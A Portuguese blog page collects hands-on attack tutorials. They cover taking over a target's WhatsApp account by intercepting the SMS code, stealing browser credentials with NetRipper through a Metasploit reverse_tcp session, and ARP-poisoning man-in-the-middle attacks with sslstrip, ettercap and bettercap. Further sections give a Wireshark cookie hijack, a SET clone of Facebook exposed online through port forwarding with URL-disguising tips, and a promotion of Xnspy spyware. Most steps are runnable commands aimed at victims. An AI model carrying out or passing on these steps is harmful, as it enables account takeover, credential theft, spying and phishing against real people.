Mostrando postagens com marcador Sniffing e Spoofing. Mostrar todas as postagens
Mostrando postagens com marcador Sniffing e Spoofing. Mostrar todas as postagens

Como extrair/gerar WhatsApp key de qualquer Android


WhatsDump é um script que permite você extrair a chave privada de um usuário do WhatsApp de dispositivos Android (suportando inclusive a versão superior a Android 9 e 10). O que a ferramenta faz é basicamente criar um emulador Android rodando versão 6.0 com root e registrar o número do telefone do WhatsApp referente ao arquivo "msgstore.db.crypt12" que você tenha informado previamente ao script.

Script: https://github.com/MarcoG3/WhatsDump
Repositório sumiu? Fork: https://github.com/MarcoG3/WhatsDump

Primeiramente obtenha o arquivo "msgstore.db.crypt12" que fica no smartphone do alvo no caminho ".../WhatsApp/Databases/". Então em um dispositivo com root, use um emulador Android no computador e habilite seu root, clique aqui e saiba mais, instale o WhatsApp e depois cole o arquivo "msgstore.db.crypt12" no caminho ".../WhatsApp/Databases/" (em uma instalação limpa do WhatsApp, é necessário criar a pasta "Databases") do Android com root. Feito isso, abra o aplicativo e então registre normalmente o número do alvo, será necessário interceptar o sms ou a ligação contendo o código para registrar o número, (caso o alvo utilize pin, será necessário obter o pin). Após registrado, no WhatsApp do alvo aparecerá uma notificação: "Desconectado do WhatsApp. Seu número de celular não está mais registrado neste aparelho". Então, confirme que você quer restaurar o backup local e pronto. Agora basta, com permissões de root em algum aplicativo explorador de arquivos, navegar até o caminho "/data/data/com.whatsapp/files" e copiar o arquivo "key" para então depois usar algum software para descriptografar o histórico de conversas, clique aqui e saiba mais.

Note que no WhatsApp do alvo aparecerá a seguinte mensagem:
"Seu número de celular não está mais registrado com o WhatsApp neste aparelho. Provavelmente você já tenha registrado esse número em outro aparelho. Caso você não tenha feito isso, confirme seu número de celular para acessar sua conta."

Resumindo, o alvo pode rapidamente restaurar a conta. Para evitar ser vítima desses golpes uma dica é jamais fornecer o código de ativação se chegar por sms ou ligação, inclusive o WhatsApp alerta sobre isso, quando alguém tenta registrar seu número uma notificação aparece em seu aparelho: "Um código de registro do WhatsApp foi solicitado para seu número de celular.". Também é importante deixar ativado o PIN, saiba mais clicando aqui.

Hackeando navegadores com Metasploit para roubar suas senhas


Um aplicativo chamado NetRipper que  é uma ferramenta que permite o tráfego de pós-exploração da rede de intercepção e, por exemplo, é capaz de capturar criptografia tanto plana e tráfego. Em outras palavras, podemos hackear navegadores máquina e roubar credenciais do Gmail, Facebook, Twitter, Outlook, uma vez que estamos em um nível inferior, antes que os HSTS fazer o seu jogo. Também pode remover cookies de sessão, por isso, se a vítima é um serviço que conecta a cookie persistente poderia subtrair. A ferramenta tem uma versão do Windows com um .EXE binário ou, uma versão para PowerShell e outra versão em a forma módulo Metasploit.que me chamou a atenção foi o  PowerShell, pois poderia ser usado com o script Empire PowerShell e use -o como pós-operação e a versão do Metasploit, como com sessão Meterpreter poderia fazer grandes coisas.. Para o caso de Metasploit Instalando NetRipper no Metasploit Como você pode ler na ferramenta Github, a instalação é básica, basta baixar os arquivos, siga os passos abaixo: 
cd NetRipper
cd Metasploit
cp netripper.rb /usr/share/metasploit-framework/modules/­post/windows/gather/
mkdir /usr/share/metasploit-framework/modules/­post/windows/gather/netripper
g++ -Wall netripper.cpp -o netripper
cp netripper /usr/share/metasploit-framework/modules/­post/windows/gather/netripper/
cd ../Release
cp DLL.dll /usr/share/metasploit framework/modules/post/windows/gather/ne­tripper/DLL.dll
PoC: Hakeando navegadores e obtendo contra senhas do Gmail e Facebook
A prova de conceito começou no estado em que o auditor ou o atacante já alcançaram sessão Meterpreter. Sem perder a sessão de executar o comando de fundo e, em seguida, carregar o módulo com a instrução de uso netripper post / windows / recolher / netripper. Como você pode ver na foto, o módulo oferece várias opções através de seus atributos.
Há vários atributos que precisamos configurar. O primeiro, que é necessário , é a identificação da sessão. Temos para indicar para qual sessão que deseja executar a pós-exploração módulo. Nesta prova de conceito que usamos a sessão
msfconsole
use multi/handler
set LHOST 192.168.0.102
set LPORT 4444
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
background
use post/windows/gather/netripper
show options
set PROCESSNAMES iexplore.exe
set SESSION 1
exploit
session -1
O módulo irá listar os processos e manterá os processos que se encaixam os valores no atributo PROCESSNAMES, como você pode ver na imagem.
Neste momento, vemos que temos 2  processos hackeados da Internet Explorer. No seguinte caminho da máquina comprometida começará a gravar arquivos de texto com as solicitações HTTP que o navegador envia imediatamente antes de ser criptografado.
Se a vítima visita o Facebook e os registros ou apenas ter uma sessão aberta, podemos roubar o cookie de sessão. Na imagem seguinte vemos como roubar a senha do Facebook, tudo que você tem a fazer é apresentar o arquivo acima. Como nota explicativa, com Meterpreter você pode baixar arquivos de texto com esta informação NetRipper gerado na máquina comprometida. O comando que usamos é baixar [fonte caminho] [caminho de destino].
NetRipper é uma potente ferramenta integrada com o framework de Metasploit,o que torna um processo complexo que pode levar tempo  em uma auditoria pode fazê-lo rapidamente

Network Man In Middle Attack In kali linux


Rede In The Middle Attak é usado para capturar todos os dados de imagem que está viajando através de nossa rede Target.
Qualquer um que está ligado à nossa rede seja qual for imagens que vêem em seu navegador, vamos capturar e exibi-los no time.We reais vão usar websploit então vamos começar.
Passo 1: Abra seu tipo de terminal websploit e aperte enter.
websploit aberto
Digite show modules que ele lista todos os ataques com breve descrição.
Mostrar módulos
Agora digite use network/mitm e aperte enter.
uso mitm
 Digite o seguinte comando  show options e pressione enter.It mostra os detalhes que você precisa para preencher para lançar um ataque.
mostrar opções
Agora precisamos endereço ip da vítima.
Abra outro terminal Agora estamos indo  usar nmap para scannig todos os hosts ao vivo em nossa rede.
Abra o terminal e digite o seguinte comando nmap -sP 192.168.1. * Ele irá listar todos os hosts ao vivo na sua rede, para escolher um endereço IP para o ataque.
encontrar um hospedeiro
Defina o seu alvo substituir ip com o seu destino de comando. set TARGET 192.168.1.3  e pressione enter.
definir um IP
Definir a sua interface para wireless tipo de adaptador de rede o comando a seguir.
set INTERFACE wlan0
Selecione Interface
Agora digite run.
executar este comando
Depois de executar o comando drifnet vai começar a capturar todas as imagens que vítima browses.As você pode ver na imagem abaixo.
mdric

Realizando ataque Man in the Middle com SSLStrip e Ettercap


Esse teste "envenena" a Tabela ARP da vitima, fazendo com que a máquina atacante, nossa, se passe pelo roteador, fazendo com que consigamos interceptar o tráfego e ter acesso a dados sigilosos trocados entre os dois atores.

A exploração do ARP Poisoning é o método mais rápido de se estabelecer no meio da comunicação entre duas máquinas e interceptar as informações enviadas entre ambas, fazendo com que possua acesso a dados confidenciais, senhas e relatórios de tráfego. Esse método se aplica somente em redes Ethernet ou seja, esse tipo de comunicação pode ser resumido em redes internas, sejam elas empresariais, residenciais ou até mesmo aquele wifi livre na praça de alimentação do Shopping ou do café que você gosta de frequentar.

1. Ambiente 

Neste exemplo faram parte 3 atores:

192.168.1.52 - Máquina atacante com Debian 8 Jessie
192.168.1.57 - Vítima com Windows 8.1, podendo ser qualquer outro sistema operacional, Windows, Linux ou OSX
192.168.1.1. - Roteador como Gateway

2. Preparando o ataque.

Neste exemplo, vamos precisar ficar com 3 terminais abertos.
Abra o primeiro terminal. Agora vamos ativar o redirecionamento de pacotes.
# echo 1 > /proc/sys/net/ipv4/ip_forward
Agora vamos efetuar todo o redirecionamento de pacotes que chegar na porta 80 da nossa máquina para a porta 7777
# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 7777
Agora vamos ativar o Arpspoof para confundir a tabela ARP da vítima, a sintaxe é a seguinte:
# arpspoof -i INTERFACE -t IP-DA-VITIMA IP-DO-GATEWAY
No nosso caso, como estou efetuando o ataque de uma interface Wireless a sintaxe ficaria
# arpspoof -i wlan0 -t 192.168.1.57 192.168.1.1
Vamos deixar esse terminal aberto infectando a tabela ARP da vítima. Vamos abrir outro terminal e colocar o SSLSTRIP para escutar a porta 7777
Abra outro terminal e como root, digite:
# sslstrip -l 7777
Agora colocamos o sslstrip para entrar em modo listening e ouvir tudo que chegar na porta 7777
Abra o terceiro terminal, e como root, digite:
# ettercap -Tq -i  wlan0
O ettercap é um poderoso sniffer de rede, e ele que vai nos mostrar tudo que passar pela placa wlan0 da nossa máquina. Agora a máquina da vítima está totalmente vigiada, e interceptaremos todos os pacotes que ela enviar para o gateway
Agora vamos aguardar o Host acessar algum site e preencher algum formulário. Lembrando que o Ettercap e o SSLStrip irá capturar tudo, não somente as senhas

Realizando ataques Man in the Middle com Ruby utilizando o Bettercap


O Bettercap é um sniffer de rede muito poderoso escrito em Ruby que pode ser utilizado para realizar ataques de Man in the Middle.  O Bettercap no quesito de interceptação de pacotes. É uma ferramenta realmente muito simples de se manipular.

Instalando as dependências:
 # apt-get install ruby-dev libpcap-dev
Instalando o Bettercap:
 # gem install bettercap
Executando o Bettercap:
Primeiramente vamos dar uma olhada no helper do Bettercap, que por sua vez é bem completo.

 # bettercap --help
  _     _  _
 | |__  ___| |_| |_ ___ _ __ ___ __ _ _ __
 | '_ \ / _ \ __| __/ _ \ '__/ __/ _` | '_ \
 | |_) | __/ |_| || __/ | | (_| (_| | |_) |
 |_.__/ \___|\__|\__\___|_| \___\__,_| .__/
                    |_| v1.1.5
 http://bettercap.org/
    Usage: /usr/local/bin/bettercap [options]
   -G, --gateway ADDRESS      Manually specify the gateway address, if not specified the current gateway will be retrieved and used. 
   -I, --interface IFACE      Network interface name - default: wlan3
   -S, --spoofer NAME        Spoofer module to use, available: ARP, NONE - default: ARP
   -T, --target ADDRESS1,ADDRESS2  Target IP addresses, if not specified the whole subnet will be targeted.
   -O, --log LOG_FILE        Log all messages into a file, if not specified the log messages will be only print into the shell.
   -D, --debug           Enable debug logging.
   -L, --local           Parse packets coming from/to the address of this computer ( NOTE: Will set -X to true ), default to false.
   -X, --sniffer          Enable sniffer.
     --sniffer-source FILE    Load packets from the specified PCAP file instead of the interface ( will enable sniffer ).
     --sniffer-pcap FILE     Save all packets to the specified PCAP file ( will enable sniffer ).
     --sniffer-filter EXPRESSION Configure the sniffer to use this BPF filter ( will enable sniffer ).
   -P, --parsers PARSERS      Comma separated list of packet parsers to enable, "*" for all ( NOTE: Will set -X to true ), available: FTP, MAIL, NTLMSS, HTTPS, URL, IRC, HTTPAUTH, POST - default: *
     --no-discovery        Do not actively search for hosts, just use the current ARP cache, default to false.
     --no-spoofing        Disable spoofing, alias for --spoofer NONE.
     --half-duplex        Enable half-duplex MITM, this will make bettercap work in those cases when the router is not vulnerable.
     --proxy           Enable HTTP proxy and redirects all HTTP requests to it, default to false.
     --proxy-https        Enable HTTPS proxy and redirects all HTTPS requests to it, default to false.
     --proxy-port PORT      Set HTTP proxy port, default to 8080 .
     --proxy-https-port PORT   Set HTTPS proxy port, default to 8083 .
     --proxy-pem FILE       Use a custom PEM certificate file for the HTTPS proxy.
     --proxy-module MODULE    Ruby proxy module to load.
     --httpd           Enable HTTP server, default to false.
     --httpd-port PORT      Set HTTP server port, default to 8081.
     --httpd-path PATH      Set HTTP server path, default to ./.
     --check-updates       Will check if any update is available and then exit.
   -h, --help            Display the available options.
 
 For examples & instructions please visit http://bettercap.org/features/  Podemos executar o Bettercap do modo mais cru possível, passando pra ele somente o parâmetro de execução. Deste modo ele irá sniffar a rede inteira, poisonando todas as tabelas Arps que encontrar

 # bettercap -X
Porém podemos otimizar nossos parâmetros para fazer o bettercap sniffar somente o importante, tirando as informações desnecessárias dos nossos logs e concentrando o processamento só naquilo que é realmente relevante como senhas e etc.
 # bettercap -X -G 192.168.1.1 -T 192.168.1.66  -O log.txt --proxy 80 --proxy-https 443
Onde:
 # bettercap -X -G <ip-do-gateway> -T <target1, target2> -O <arquivo-de-saida> --proxy <porta> --proxy-https <porta-do-https>
Agora é só esperar a interceptação daquilo que você deseja.


Android com Xnspy - Dispositivo (s) monitorado por XNSPY


Xnspy é uma ferramenta de espionagem, comercializado como uma ferramenta de controle parental que é projetado para controlar remotamente Android e iOS smartphones.


No caso do iOS, como muitos já sabem, malware executar é mais complexa do que no Android, mas o autor confirma a compatibilidade do software sem dispositivos Jailbreak iOS 8.4.1 para iOS e versões iOS 9.0.2 Jailbreak até.

Xnspy dá a possibilidade de interceptar SMS, IMessage, whatsaspps, Viber, Line, Facebook Messenger, Skype, e-mail, de posicionamento GPS, câmera, microfone e assim por diante.

A edição básica custa $ 8,33 XNSPY / Mesy Premium 12,49.

O link a seguir disponéis um ambiente de demonstração onde você pode testar todas as funções do software:

Hacking Facebook - Engenharia social Toolkit



Hacking Facebook

Engenharia social Toolkit

Os seres humanos são o elo mais fraco em qualquer sistema de segurança ~ Shashwat (Isso vai ser me)

O Toolkit social-Engineer (SET) foi criado e escrito pelo fundador da TrustedSec. É uma ferramenta orientada para o Python open-source que visa testes de penetração em torno social-Engenharia. SET tem sido apresentados em conferências de grande escala, incluindo Blackhat, DerbyCon, Defcon, e ShmooCon. Com mais de dois milhões de downloads, SET é o padrão para testes de penetração de engenharia social e apoiou fortemente dentro da comunidade de segurança.

Kali Linux

Eu não sinto a necessidade de mencioná-lo, mas eu ainda vou fazer isso. Você precisa Kali Linux para prosseguir com este tutorial.

Se-kit de ferramentas

Comece Kali Linux. Em um kit de ferramentas de console se-tipo / terminal.
Algo como isso vai aparecer
root @ kali: ~ # se-toolkit
[-] Novo arquivo set_config.py gerada em: 2014/05/26 08: 26: 33,526119
[-] Verificando a atualização de configuração ...
[*] Atualização verificada, configuração timestamp é: 2014/05/26 08: 26: 33,526119
[*] SET está usando a nova configuração, não há necessidade de reiniciar
_______________________________
/ _____ / \ _ _____ / \ __ ___ /
\ _____ \ | __) _ | |
/ \ | \ | |
/ _______ _______ // / | ____ |
\ / \ /
[-] O Toolkit social-Engineer (SET) [-]
[-] Criado por: David Kennedy (ReL1K) [-]
[-] Versão: 4.3.9 [-]
[-] Codename: 'Turbulence' [-]
[-] Siga-nos no Twitter:trustedsec [-]
[-] Siga-me no Twitter: @ dave_rel1k [-]
Bem-vindo ao Toolkit social-Engineer (SET). Único
balcão único para todas as suas necessidades de engenharia social.


Selecione a partir do menu:
1) Os ataques de engenharia social-
2) Fast-Track Teste de Invasão
3) Em terceiro lugar Módulos partido
4) Atualizar o Metasploit Framework
5) Atualizar o Toolkit social-Engineer
6) Atualizar configuração SET
7) Ajuda, Créditos e Sobre
99) Sair do Toolkit social-Engineer
set>
Agora digite o seguinte e pressione ENTER.
1 [entrar] 2 [entrar] 3 [entrar]

Explicação

  • 1 seleciona ataques de engenharia social. Escolha óbvia se você ler as outras opções 1-9 (e 99 para a saída)
  • O 2 seleciona site Vetores de Ataque. Não que óbvio. O módulo Ataque Web é uma maneira original de utilizar múltiplos ataques baseados na web, a fim de comprometer a vítima.
  • Em seguida, o 3 seleciona Credencial Harvestor. O método de credenciais Harvester irá utilizar a clonagem web de um web-site que tem um campo de nome de usuário e senha e colher todas as informações postadas no site.
Agora você vai estar vendo algo como this- O primeiro método permitirá SET para importar uma lista de pré-definido web
aplicações que pode utilizar no âmbito do ataque.
O segundo método irá clonar completamente um site de sua escolha
e permitir-lhe utilizar os vetores de ataque dentro do completamente
mesma aplicação web você estava tentando clonar.
O terceiro método permite importar seu próprio site, note que você
só deve ter um index.html ao usar o site de importação
funcionalidade.
1) Modelos Web
2) Cloner do Site
3) a importação personalizada
99) Regressar ao Menu WebAttack
Digite 2 para selecionar site de cloner.

Encontre o seu IP

Em um novo tipo de terminal ifconfig. Isto lhe dará o seu endereço IPv4, que é o que você está procurando

Voltar a se-toolkit

Agora ele vai pedir para você especificar o IP ao qual os dados é suposto ser enviada. Isso vai ser o seu endereço IP. Uma vez que este é o seu endereço IP interno (ou seja, IP local), a página de facebook falso irá funcionar apenas para computadores conectados com a rede local.
Agora ele vai pedir para a página a ser clonada. Digite https://www.facebook.com/.
set: WebAttack> 2
[-] Harvester Credencial lhe permitirá utilizar as capacidades de clone dentro SET
[-] Para colher credenciais ou parâmetros a partir de um site, bem como colocá-los em um relatório
[-] Essa opção é usada para o IP do servidor irá postar a.
definir: WebAttack> endereço IP para o cargo de volta em Harvester / Tabnabbing: 192.168.154.133
[-] SET suporta HTTP e HTTPS
[-] Exemplo: http://www.thisisafakesite.com
set: WebAttack> Digite o url para clonar: https://www.facebook.com/
Agora no seu browser em Kali Linux, digite o seu IP. Ele irá exibir página de login do Facebook. Digite qualquer informação e imprensa login. Você vai obter a informação em si-toolkit. Se você estiver usando VMWare ou VirtualBox, então você pode tentar e digite o IP sobre os navegadores lá. Vai funcionar.

Demonstração ao vivo

Para certificar-se que a manifestação não é apenas uma repetição do que você já sabe, eu decidi para clonar a página de login do Facebook, em vez de homepage. Será um pouco diferente. Aqui está uma imagem do que eu fiz.
O endereço IP é o meu endereço interno de ifconfig, que vem a ser 192.168.154.133. A página clonada é https://www.facebook.com/login.php. Agora vamos tentar ver se este Harvestor credencial funciona.

Na máquina Linux em si Kali

Entrando no IP no browser mostra a página de login falsa. Além disso, se-toolkit registra a visita e diz 192.168.154.133 - - [02 / novembro / 2015 02:32:32] "GET / HTTP / 1.1" 200 -
Agora, se digitar algo no campo, ele também aparece em se-toolkit. Entrei 'hackerkalilinux' no campo de nome de usuário e 'password' no campo de senha. Isto é o que se-toolkit shows-
Campo Nome de Usuário POSSÍVEL ENCONTRAR: email = hackerkalilinux
CAMPO POSSÍVEL ENCONTRAR SENHA: passe = senha
Observe também que se pode manter-toolkit despejar mais coisas no console, a maioria dos quais não é importante para o momento.

No Windows 8 máquina (host)

Agora eu estou correndo Kali em uma máquina virtual. Windows 8 é a máquina host, e nós pode querer verificar se ele funciona em Windows 8. Além disso, nós também gostaríamos de ver se navegadores modernos são capazes de observar nada de errado com a página, e se o firewall para o fluxo de dados.
Entrei windows8host e password2 e apertou o botão de login. Isto é o que eu tenho. Além disso, como eu estava logado no Facebook com a minha conta pessoal, a página falsa me redirecionado para facebook.
Campo Nome de Usuário POSSÍVEL ENCONTRAR: email = windows8host
Campo de senha POSSÍVEL ENCONTRAR: pass = password2
Conclusão: Este método funciona bem praticamente over LAN.

Fazê-lo funcionar através da Internet

Para fazer o trabalho técnica através da Internet, você vai precisar usar seu IP público em vez de privado. Pesquisa do Google para o que é o meu IP para encontrá-lo IP público. Em seguida, usá-lo. Você pode usar tinyurl ou algo para tornar o url pareçam legítimos. Além disso, o encaminhamento de porta pode precisar ser ativado, como o roteador pode bloquear o tráfego na porta 80. Firewall também pode causar problemas. Embora este tutorial foi nada mais do que - se-toolkit 1 2 3 [seu IP], 

Phis. Facebook



Port Forwarding : Phishing Facebook

No tutorial anterior, criamos uma página de login falsa no Facebook usando harevester Credencial. Isso, entretanto, só funcionaria através da rede de área local. Hoje vamos permitir o encaminhamento de porta em nosso roteador e usar o nosso endereço IP externo para criar uma página de phishing que irá trabalhar através da internet. A imagem dá uma boa idéia do que faz o encaminhamento de porta. No caso anterior, a secção era visível somente para computadores, no lado direito do guarda-fogo, ou seja, aqueles dentro da rede local. O firewall processa o tráfego que vem através de endereço público e decide se a transmiti-lo à rede interna ou bloqueá-lo. O recurso de encaminhamento de porta do roteador diz-lhe para permitir o tráfego através de uma determinada porta.

Pré-requisitos

  1. Deve saber como usar SET e Credencial Harvester através da rede de área local. Se não ler o tutorial em Credencial Harvester (o mesmo que no link acima).
  2. Kali Linux ou recuar 5 (outras distribuições Linux vai funcionar se você pode instalar SET e todas as dependências)
  3. Paciência - Encontrar a sua senha do roteador pode ser difícil às vezes.
  4. Alguns conhecimentos básicos (ler alguns posts antigos sobre este blog que eu tinha escrito assumindo que os novatos foram os de leitura.)

Encontre você IP público

Vá ao Google e procurar qual é o meu IP. Em circunstâncias normais você nem sequer tem que clicar em qualquer um dos resultados, o Google vai encontrar o seu IP para você. Se não, então um dos melhores resultados com certeza vai.
Tirei o endereço. Mas ele vai aparecer no seu caso.

Encontrar o IP do roteador e fazer o login

Na maioria das vezes o IP é 192.168.1.1 ou uma ligeira variação, mas fazer um ifconfig para descobrir. Agora digite o IP do seu navegador, e você verá um prompt de login. Aqui está algo que normalmente funciona-
  • Nome de usuário: admin
  • Senha: senha, admin ou em alguns casos, deixe o campo de senha em branco
Se nenhum dos trabalhos combos acima, tente este http://www.routerpasswords.com/ ou http://lmgtfy.com/?q=default+router+password
Este é o passo onde eu não posso ajudar muito. Você precisa ver o que o seu router é e, em seguida, descobrir os detalhes de login. Na maioria das vezes ele é deixado para o padrão. Você também pode fazer um ataque de lista de palavras com credenciais de login do roteador comum (ajudar a si mesmo, não estou indo para escrever uma tese sobre isso, porque muitas pessoas já fizeram isso, e você precisa aprender algumas google-fu). Agora depois de obter acesso ao seu router, voltar a Se-kit de ferramentas

Engenharia social Toolkit: Credencial Harvestor

Aqui está o conjunto de comandos que você irá precisar. Se você precisar os detalhes verificar o post anterior.
se-toolkit
1 (entrar)
2 (entrar)
3 (entrar)
2 (entrar)
Digite seu IP público (primeiro passo lembrar)
Digite o site que você deseja clonar (O método funciona igualmente bem com o Facebook, Gmail, Twitter ou qualquer outra coisa. Nenhum dos passos serão diferentes em tudo para qualquer site).
Agora é só deixar o terminal de ser e voltar para o seu router.

Os roteadores são todos diferentes: Port Forwarding

Agora, aqui é outra parte mais difícil deste tutorial. Enquanto a coisa que precisa ser feito é o mesmo para todos os roteadores, o procedimento não é. Você vê, a interface de interação com o usuário-roteador é diferente para todos os roteadores.
Isto é o que o meu roteador olha como
A coisa que você tem que saber é-
  • Termos de olhar para - NAT, encaminhamento de porta, os servidores virtuais (o roteador pode referir-se ao encaminhamento de porta usando qualquer um destes termos). Se você encontrar algo parecido com isso, clique sobre ele. Além disso, muitas vezes a interface de roteadores é bastante complicado e avançado, com campos separados para WAN, LAN, controle de acesso, etc. Você vai ter que dar uma olhada ao redor e ver onde você pode encontrar qualquer coisa relacionada ao encaminhamento de porta. Quando você fizer isso, você pode se mover para o passo abaixo.
  • Stuff to sas
  1. Nome do aplicativo - A maioria dos roteadores pedir-lhe que dê um nome para a configuração encaminhamento de porta. Muitos também têm um menu contendo razões mais comuns por que as pessoas executar o encaminhamento de portas para baixo (o menu drop-down na maior parte tem jogos multiplayer e outras coisas, não espere SET lá). Este campo é insignificante, digite o que você quiser. Talvez SET.
  2. Porto / First Porto / Last Port - Alguns roteadores apenas pedir-lhe qual a porta de transmitir, alguns pedir-lhe para introduzir um intervalo. No entanto, você vai entrar tanto 80 como o único porto, ou 80-80 como o intervalo. Qualquer campo que pede qualquer coisa relacionada ao porto, e 80 é o que você vai entrar.
  3. Protocol (ou algum outro nome) - Ele terá opções TCP, UDP, ambos (ambos podem ser substituídos por todos ou TCP e UDP ou algo assim). Escolha ambos ou o que corresponde a ambos em seu roteador.
  4. Endereço IP (às vezes não) - Aqui você entra em seu IP local. 192.168.1.xxx ou algo assim. Não é o seu IP público.
Salve e você é bom para ir. Se você tiver qualquer campo que você não tem certeza sobre, mencioná-lo nos comentários. Ele irá ajudá-lo, bem como outros usuários que têm a mesma dificuldade. E aqui está como eu configurá-lo, olhe para a captura de tela e olhar para os campos relevantes em seu roteador.

Continue

Agora, abra qualquer navegador e digite você IP. Você vai ver a sua página de login falsa Facebook lá. Além disso, tente e digitar algo nos campos. Ela vai aparecer no terminal Se-toolkit. A captura de tela abaixo mostra o que parece no meu navegador (De alguma forma se-toolkit decidiu clonar a versão Hindi do site. Eu não tenho qualquer memória de alguma vez usando Facebook em Hindi embora).
Depois que entrei dados nos campos e pressionar o botão de login, a seguinte apareceu na minha janela se-toolkit.

Torná-la real

Agora, existem muito poucos que vai introduzir os seus dados de login para um site cujo nome não é ainda um nome, mas um conjunto de números separados por pontos. Você pode usar bit.ly ou goo.gl para para isso. No entanto, eles não mascarar o URL, e, logo que o utilizador chega ao destino, ele vai ver o URL original. Eu teria recomendado tk ponto, mas eles não suportam endereços IP. Neste caso, você pode usar no-ip, que vai resolver um monte de problemas-
  1. Você vai ter um IP estático
  2. Você vai ter um nome de domínio comparitively menos desconfiados
  3. Você estará mais seguro. Isto porque partilhar o seu endereço IP público na Internet não é uma boa idéia. E com uma porta aberta, as pessoas (por pessoas que eu quero dizer hackers profissionais que sabem o que estão fazendo) pode entrar em seu sistema. (Se você notou que eu nunca mencionei o meu IP pública em qualquer lugar do post, nem colocada qualquer tela com ele. Todos os visitantes do meu site são hackers, e alguns são melhores do que eu, então eu não estou convidando problemas aqui).
Alternativamente, você pode dar uma olhada aqui no http://www.pc-help.org/obscure.htm. Esta página lida com a arte de modificar o URL para enganar os outros. No nosso caso, vamos usá-lo para fazer o nosso endereço IP parecido com um site legítimo. O único problema é algum do material não é independente do navegador e iria trabalhar apenas em alguns navegadores (Cada navegador trata de uma URL de forma diferente).

Hackeando FACEBOOK com Wireshark e Cookie injetor


Primeiramente você vai precisar estar na mesma rede que seu alvo. Se você não tem um alvo específico, qualquer rede pública serve. Vamos precisar de: Uma distro Linux para facilitar Windows qualquer (não sei se foi o chrome ou se foi o mac mas não funcionou no mac) SSLStrip Wireshark Arpspoof Greasemonkey Cookie injector para Greasemonkey Firefox ou Iceweasel Bastante coisa, não é um tuto muito fácil. Mas depois de um tempo de prática você vê que também não é tão difícil. Primeiramente baixe tudo o que você não tem. Se você usa Back Track ou Kali, falta apenas o Greasemonkey e o Cookie Injector, com algumas buscas no google você encontra... Vamos ao tuto então! Primeiro de tudo temos que ativar o encaminhamento dos pacotes. Para isso basta digitar o comando abaixo: echo 1 > /proc/sys/net/ipv4/ip_forwarding O próximo passo é criar uma regra no iptables para redirecionar todo o tráfego: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 Agora sim vamos iniciar o ataque de verdade, inicie o sslstrip para ficar escutando o tráfego: sslstrp -a -l 8080 Agora precisamos do arp spoofing, para isso vamos usar duas vezes o comando arpspoof. Mantenha sempre as 2 abas com os 2 comandos rodando em quanto estiver capturando o tráfego: arpspoof -i eth0 -t ip_do_alvo ip_do_roteador arpspoof -i eth0 -t ip_do_roteador ip_do_alvo E por em quanto chega de terminal, vamos para a interface gráfica do wireshark. No wireshark, inicie a captura de pacotes, e para facilitar no filtro de pacotes coloque o seguinte filtro: http.cookie contains datr Provavelmente você não receberá nada de início, mas assim que seu alvo acessar um site como por exemplo o Facebook veja o que acontece: Provavelmente o último pacote GET é o que contém nosso cookie. Clique com o botão direito nele vá em Copy > Bytes > Printable Text Only: Agora só precisamos injetar isso na página do Facebook e termos acesso ao perfil do alvo. Vá então para a página do Facebook e aperte ALT + C para abrir uma janelinha bem no meio da página. Nesta janelinha cole o que copiamos antes: Se você ver uma mensagem como esta é porque o cookie foi injetado com sucesso, agora é só recarregar o Facebook e ver se funcionou: E ai está! Estamos no perfil da vítima! Algumas considerações finais: Isto funciona não só no Facebook, praticamente todos os sites geram cookies, então praticamente todos os sites (na verdade a culpa não é do site) estão vulneráveis a esse tipo de ataque. Se a pessoa estiver logando automaticamente porque ela marcou a caixa "Mantenha-me conectado" anteriormente pode ser que isso não funcione. Agora é com você, mas cuidado com o que você faz com isso

Facebook – ARP Poisoning usando SET e ettercap


Facebook – ARP Poisoning usando SET e ettercap Passo 01 Abra o aplicativo SET através do menu: Applications > Kali Linux > Exploitation Tools > Social Engineering Toolkit > se-toolkit Digite o número 1 Social-Engineering Attacks ( Ataque de Engenharia Social ) set-tool-01 Passo 02 Digite o número 2 Website Attack Vectors set-tool-02 Passo 03 Digite o número 3 Credential Harvester Attack Method set-tool-03 Passo 04 Digite o número 2 Site Cloner set-tool-04 Passo 05 Digite o IP do atacante host KALI 10.10.10.200 set-tool-05 Passo 06 Digite o endereço do site que deseja clonar no exemplo: https://www,facebook.com ou www.facebook.com set-tool-06 Passo 07 Durante o processo de captura todos os dados serão armazenados em /var/www set-tool-07 Passo 08 Edite o arquivo etter.dns para adicionar o novo destino da url www.facebook.com set-tool-08 Passo 09 Insira as linhas e salve o arquivo # FACEBOOK facebook.com A 10.10.10.200 *.facebook.com A 10.10.10.200 www.facebook.com PTR 10.10.10.200 set-tool-09 Passo 10 Certifique-se qual é o Gateway da rede usando o comando route set-tool-10 Passo 11 Abra o aplicativo ettercap através do menu: Applications > Kali Linux > Sniffing/Spoofing > Network Sniffers > ettercap-graphical Clique em Sniff > Unified sniffing… set-tool-11 Passo 12 Selecione a Interface de Rede> eth0 set-tool-12 Passo 13 Clique em Hosts > Scan for hosts set-tool-13 Passo 14 3 Hosts foram encontrados, clique em Hosts > Hosts list para visualizá-los set-tool-14 Passo 15 Selecione os hosts Gateway ( 10.10.10.2 ) e WIN-8 ( 10.10.10.146 ) e clique em Add to Target 2 set-tool-15 Passo 16 Clique em Plugins > Manage the plugins set-tool-16 Passo 17 De um duplo-clique em dns_spoof para ativar o plugin set-tool-17 Passo 18 Clique em Mitm > Arp poisoning… set-tool-18 Passo 19 Selecione a opção Sniff remote conections set-tool-19 Passo 20 O grupo com os hosts é criado, em seguida Clique em Start > Start sniffing set-tool-20 Passo 21 O sniffing é iniciado. set-tool-21 Passo 22 No host WIN-8 ( 10.10.10.146 ) acesse o site www.facebook.com e informe o e-mail e senha de acesso. set-tool-22 Passo 23 Ao explorar o diretório /var/www observe que foram criados 03 arquivos. harvester_2015_02-17 10:53:37.023687.txt : Arquivo que contem todos os dados capturados como Usuário e Senha set-tool-23 Passo 24 Basta abrir o arquivo harvester_2015_02-17 10:53:37.023687.txt para visualizar os dados capturados. set-tool-24

bettercap


A ferramenta bettercap foi desenvolvida em Ruby pelo programador italiano Simone “evilsocket” Margaritelli, é uma ferramenta que realiza o ataque MITM com rapidez e de forma bem amigável.

01 Passo
Realize o download do pacotes
root@kali:/# apt-get install ruby-dev libpcap-dev
bettercap01
02 Passo
Instalando o bettercap
root@kali:/# gem install bettercap
bettercap02
03 Passo
Obtendo Ajuda
root@kali:/# bettercap –help
bettercap03
04 Passo
Executando o bettercap
root@kali:/# bettercap -X
bettercap04

bettercap05
05 Passo

Captura de informações


